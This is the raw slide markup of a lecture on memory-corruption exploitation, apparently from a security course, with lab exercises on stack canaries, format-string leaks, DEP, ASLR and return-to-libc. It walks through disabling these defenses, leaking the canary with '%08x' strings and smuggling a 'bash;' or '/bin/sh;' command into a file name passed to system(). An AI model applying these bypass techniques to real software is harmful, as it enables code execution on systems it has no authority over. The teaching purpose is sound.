            <a:xfrm>
              <a:off x="7649452" y="2590800"/>
              <a:ext cx="199390" cy="292735"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="292735" w="199390">
                  <a:moveTo>
                    <a:pt x="199147" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="192900" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="186656" y="391"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140682" y="11617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="104391" y="31817"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="72288" y="60601"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="45099" y="96797"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23536" y="139280"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8367" y="186746"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="275" y="238157"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="292299"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8654" y="235636"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25647" y="184206"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="49970" y="139236"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="80471" y="102127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="116214" y="74017"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="156121" y="56220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="199147" y="50006"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="199147" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="000000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g24e5311e72c_0_690"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7648576" y="2590800"/>
              <a:ext cx="200025" cy="601344"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="601344" w="200025">
                  <a:moveTo>
                    <a:pt x="0" y="267296"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3675" y="318411"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14292" y="366577"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="31237" y="410735"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="53896" y="449826"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="81655" y="482790"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="113900" y="508569"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="150017" y="526104"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="150017" y="501099"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="200023" y="559594"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="150017" y="601111"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="150017" y="576109"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="113900" y="558574"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="81655" y="532795"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="53896" y="499831"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="31237" y="460740"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14292" y="416582"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3675" y="368416"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="317300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="267296"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4063" y="213426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15718" y="163252"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34160" y="117848"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="58585" y="78289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88188" y="45649"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="122165" y="21005"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="159712" y="5430"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="200023" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="200023" y="50005"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="156997" y="56220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="117091" y="74017"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="81347" y="102127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="50810" y="139280"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26524" y="184206"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9531" y="235635"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="877" y="292299"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:noFill/>
            <a:ln cap="flat" cmpd="sng" w="25400">
              <a:solidFill>
                <a:srgbClr val="0AD4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3" name="Google Shape;833;g24e5311e72c_0_690"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9098915" y="2452260"/>
            <a:ext cx="10293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75">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="12700" marR="5080" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="104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Set of valid addresses for command string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24e5311e72c_0_704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Stack-Smashing Protection</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="840" name="Google Shape;840;g24e5311e72c_0_70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Each program generates a random value at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>initialization</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> which is used as a </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-US"/>
              <a:t>canary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 each function call, the canary value is placed on the stack before any local variables are allocated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On function exit, the canary value is checked against the original value to ensure it is not overwritten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24e5311e72c_0_710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Canary Values</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="847" name="Google Shape;847;g24e5311e72c_0_710"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4286250" y="1593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{2699E51E-27AD-45A0-8260-30540317AD18}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1581150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Stack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E46C0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&amp;fileName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Saved EIP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Saved EBP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3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&amp;filePointer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dataBuffer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dataBuffer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dataBuffer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dataBuffer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dataBuffer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8" name="Google Shape;848;g24e5311e72c_0_710"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6191250" y="1593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{2699E51E-27AD-45A0-8260-30540317AD18}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1581150"/>
              </a:tblGrid>
              <a:tr h="19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Stack (w/ Canary)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E46C0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&amp;fileName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Saved EIP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Saved EBP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Canary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66"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="23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&amp;filePointer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dataBuffer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dataBuffer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dataBuffer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dataBuffer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558E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dataBuffer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24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24e5311e72c_0_718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Exercise: memcor/readData5</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="855" name="Google Shape;855;g24e5311e72c_0_7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Objective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Observe the effect of Stack-Smashing Protection on our previously successful exploit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Procedure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Compile program with DEP and Canaries enabled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$ make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Debug and spot the canary value in memory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gdb readData5;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break myFunction;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run [file];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x/20xw dataBuffer;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Attempt to overflow buffer with any data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python3 -c ‘print(“A”*30)’ &gt; input.txt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24e5311e72c_0_724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Bypassing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> Canaries</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="862" name="Google Shape;862;g24e5311e72c_0_7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generated canary for a 32-bit architecture consisted of 3 random bytes (24 bits) and one null byte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e.g. 0xA4952F00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Buffer overflow considerations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The overflow cannot be caused by a null-terminated function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Every function call uses the same canary value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Forked processes have identical memory layout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Our options to bypass canaries are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Exploit a non-stack based overflow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Heap-based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Function pointer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Memory information leak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Brute Force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Requires up to 2^24 (16,777,216) attempts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24e5311e72c_0_730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Format String Vulnerability</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="869" name="Google Shape;869;g24e5311e72c_0_730"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1457250"/>
            <a:ext cx="10515600" cy="509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Unintended information disclosure vulnerability that allows us to read memory using specially crafted format tokens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printf() function pares the first parameter for format tokens.  When a token is detected, it prints data from the stack if the data was passed as a parameter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44747"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="F44747"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Bad: printf(input);</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="F44747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AD414"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="0AD414"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Good: printf(“%s”, input);</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="0AD41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Examples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Print 8-bytes from the stack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char [] input = “%08x”;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printf(input)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Print 24 bytes from the stack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Char [] input “%08x%08x%08x”;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Print a string from the stack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input = “%s”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prints contents from the stack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>until</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> a null byte is encountered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e5311e72c_0_29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Exploitation is Challenging</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="147" name="Google Shape;147;g24e5311e72c_0_2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Modern-day defenses help prevent exploitation of vulnerable software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Data Execution Prevention (DEP)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Stack-smashing protection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Address Space Layout Randomisation (ASLR)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will assess the effectiveness and demonstrate how they can be defeated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begin with defenses disabled and incrementally address each defense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Compile programs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>with</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>following</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> flags: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-z execstack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-fno-stack-protector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Modify kernel parameter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sudo sysctl kernel.randomize_va_space=0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24e5311e72c_0_736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Demonstration: memcor/printfDemo/</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="876" name="Google Shape;876;g24e5311e72c_0_73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Objective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Observe the effect of a format string vulnerability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Procedure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Examine source code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Provide input that triggers memory leak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./printfDemo %08x%08x%08x%08x%08x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24e5311e72c_0_742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Exercise: memcor/readData5/</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="883" name="Google Shape;883;g24e5311e72c_0_74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Objective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Observe the effect of a format string vulnerability and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>spot the canary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> by reading the contents of the stack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Procedure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Compile program </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>with</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> DEP and canaries enabled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make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Determine how to exploit printf memory leak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Craft malicious format string for program to expose the canary value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24e5311e72c_0_748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Overwrite Canary value</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="890" name="Google Shape;890;g24e5311e72c_0_74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can no longer use the string copy function fscanf()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Canary has a NULL byte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Our </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>buffer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> overflow will now come from a binary copy operation using the function fread()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fread(dataBuffer, 1, 400, filePointer)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Read data from filePointer into dataBuffer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Read up to 400 units of size 1 byte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Stop reading if end of file is reached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24e5311e72c_0_754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Leveraging Memory Leak at Runtime</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="897" name="Google Shape;897;g24e5311e72c_0_75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Instead of calculating or guessing the address of our command string, we will leverage the memory leak to find it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Recall the address of fileName is passed to myFunction so it will be on the stack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void myFunction(char* fileName)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will append our command string to the front of the file name as part of the memory leak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The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>semicolon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> is used to separate commands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System(“/bin/sh;%08.%08x. …%08x.”) is split into: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System(“bin/sh;”); // will succeed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System(“%08x.%08x. … %08x.”); // will not execute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24e5311e72c_0_760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Exercise: memcor/readBinaryData0/</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="904" name="Google Shape;904;g24e5311e72c_0_760"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1981200" y="2133600"/>
            <a:ext cx="8629650" cy="1276350"/>
            <a:chOff x="304800" y="2286000"/>
            <a:chExt cx="8629650" cy="1276350"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="905" name="Google Shape;905;g24e5311e72c_0_76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4800" y="2286000"/>
              <a:ext cx="8629650" cy="1276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6" name="Google Shape;906;g24e5311e72c_0_760"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="838200" y="3096243"/>
              <a:ext cx="914400" cy="228600"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="2286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AD4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7" name="Google Shape;907;g24e5311e72c_0_760"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2242819" y="3675038"/>
            <a:ext cx="990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Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Canary Value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8" name="Google Shape;908;g24e5311e72c_0_760"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4343400" y="2934318"/>
            <a:ext cx="1905000" cy="238125"/>
            <a:chOff x="2667000" y="3086718"/>
            <a:chExt cx="1905000" cy="238125"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="909" name="Google Shape;909;g24e5311e72c_0_760"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2667000" y="3086718"/>
              <a:ext cx="914400" cy="228600"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="2286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AD4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g24e5311e72c_0_760"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3657600" y="3096243"/>
              <a:ext cx="914400" cy="228600"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="2286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AD4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1" name="Google Shape;911;g24e5311e72c_0_760"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3814587" y="4139617"/>
            <a:ext cx="13341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7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Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Return address to main()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g24e5311e72c_0_760"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5824220" y="3929505"/>
            <a:ext cx="11544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7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Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Address of fileName string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3" name="Google Shape;913;g24e5311e72c_0_760"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2864075" y="3175618"/>
            <a:ext cx="3489651" cy="979170"/>
            <a:chOff x="1187675" y="3328018"/>
            <a:chExt cx="3489651" cy="979170"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="914" name="Google Shape;914;g24e5311e72c_0_760"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1187675" y="3337543"/>
              <a:ext cx="85725" cy="490220"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="490220" w="85725">
                  <a:moveTo>
                    <a:pt x="0" y="489765"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="85542" y="0"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:noFill/>
            <a:ln cap="flat" cmpd="sng" w="28575">
              <a:solidFill>
                <a:srgbClr val="0AD4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g24e5311e72c_0_760"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2884305" y="3328018"/>
              <a:ext cx="212725" cy="979170"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="979170" w="212725">
                  <a:moveTo>
                    <a:pt x="0" y="979110"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="212349" y="0"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:noFill/>
            <a:ln cap="flat" cmpd="sng" w="28575">
              <a:solidFill>
                <a:srgbClr val="0AD4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g24e5311e72c_0_760"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4195362" y="3337543"/>
              <a:ext cx="481964" cy="760095"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="760095" w="481964">
                  <a:moveTo>
                    <a:pt x="481770" y="759473"/>
                  </a:move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rgbClr val="0AD4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24e5311e72c_0_779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Exercise: memcor/readBinaryData0/</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="923" name="Google Shape;923;g24e5311e72c_0_77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Objective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Defeat DEP and Canaries by leveraging an information leak and a buffer overflow exploit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Procedure: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Compile a program with DEP and Canaries enabled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make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Name your exploit file with a string that contains your command and exploits the memory leak</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="2" marL="1371600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="65"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="20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“bash;%08x.%08x…%08x”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Execute the program to trigger memory leak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$ ./readBinaryData0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bash;%08x.%08x…%08x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Update file with “informed” ret2libc exploit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Continue program execution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Press any key to continue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24e5311e72c_0_785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Address Space Layout Randomization</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="930" name="Google Shape;930;g24e5311e72c_0_78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ASLR randomizes the starting address of various memory segments in the program virtual address space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Increases difficulty of finding addresses in the stack, heap, dynamic libraries, etc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e.g. system() is no longer static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&amp;filename will change every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How random are the starting addresses?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32-bit architecture (PaX)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Stack starting offset: 24bit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Heap and memory mapping (libraries) offset: 16 bits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64-bit architecture (PaX)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40 bits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24e5311e72c_0_791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Address Space Layout Randomization</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="937" name="Google Shape;937;g24e5311e72c_0_791"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="7302753" y="15755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{2699E51E-27AD-45A0-8260-30540317AD18}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1421125"/>
              </a:tblGrid>
              <a:tr h="67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36244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Kernel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2523"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="226050">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="116204" rtl="0" algn="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RANDOM OFFSET1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</a:tr>
              <a:tr h="67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Stack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</a:tr>
              <a:tr h="1366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73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Heap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0" marL="0" marR="116204" rtl="0" algn="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RANDOM OFFSET2</a:t>
                      </a:r>
                      <a:endParaRPr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  <a:tr h="24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BSS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6228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04A7B"/>
                    </a:solidFill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154305" rtl="0" algn="r">
                        <a:lnSpc>
                          <a:spcPct val="110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Text Segment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04A7B"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="24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sp>
        <p:nvSpPr>
          <p:cNvPr id="938" name="Google Shape;938;g24e5311e72c_0_791"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4403777" y="1165053"/>
            <a:ext cx="41409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000">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="40576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Memory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0xfffffffc	                   0xfffffffc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9" name="Google Shape;939;g24e5311e72c_0_791"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6156376" y="2459437"/>
            <a:ext cx="9405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0xbf??????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0" name="Google Shape;940;g24e5311e72c_0_791"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6156376" y="6003245"/>
            <a:ext cx="9405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0x08048000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0x00000000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941" name="Google Shape;941;g24e5311e72c_0_791"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4102354" y="15755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{2699E51E-27AD-45A0-8260-30540317AD18}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1421125"/>
              </a:tblGrid>
              <a:tr h="67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Kernel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2523"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="678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Stack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</a:tr>
              <a:tr h="1366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73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Heap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  <a:tr h="24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BSS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6228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04A7B"/>
                    </a:solidFill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Text Segment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04A7B"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="24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sp>
        <p:nvSpPr>
          <p:cNvPr id="942" name="Google Shape;942;g24e5311e72c_0_791"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2955977" y="2233377"/>
            <a:ext cx="9405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0xbffffffc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3" name="Google Shape;943;g24e5311e72c_0_791"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2955977" y="5530805"/>
            <a:ext cx="9405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0x08048000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0x00000000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24e5311e72c_0_804"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="10515600" cy="503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Objective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Observe the effect of Address Space Layout Randomization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Procedure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Enable ASLR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sudo sysctl kernel.randomize_va_space=1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Run the program multiple times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./ASLR-Demo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./ASLR-Demo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./ASLR-Demo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./ASLR-Demo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./ASLR-Demo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./ASLR-Demo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./ASLR-Demo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./ASLR-Demo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./ASLR-Demo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./ASLR-Demo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0" name="Google Shape;950;g24e5311e72c_0_804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Demonstration: memcor/ASLR-Demo/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24e5311e72c_0_810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Defeating ASLR</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="957" name="Google Shape;957;g24e5311e72c_0_8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Brute Force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Feasible</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> for 32-bit systems, not </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>feasible</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> for 64-bit systems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Noisy in both cases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Forked processes have the same memory layout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Network applications commonly fork to handle connections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Memory information leak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We can use information found on the stack to systematically derive the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>offset values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e5311e72c_0_35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 Buffer Overflow</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="154" name="Google Shape;154;g24e5311e72c_0_3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buffer overflow occurs when a program writes data outside of an intended memory (buffer) region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If data is derived from a user input, a malicious </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> may be able to effect the following </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>actions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Crash System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Control application or system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Execute arbitrary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Any program that processes input data (terminal, file, socket, etc) is potentially vulnerable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4e5311e72c_0_816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Defeating ASLR</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="964" name="Google Shape;964;g24e5311e72c_0_8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will defeat ASLR in our return-to-libc exploit by leveraging a memory information leak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information leak will allow us to read data from the stack and determine two necessary values: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Address of system()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We will derive a formula for this based on information from the stack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Address of our command string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We will use the same technique of cleverly naming the input file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24e5311e72c_0_822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Finding Dynamic system() Address</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="971" name="Google Shape;971;g24e5311e72c_0_822"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="10515600" cy="460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First we must obtain the return address of main() by looking at the stack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Where does main return? into a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> in the C Library!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main()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> is called by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start_main()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
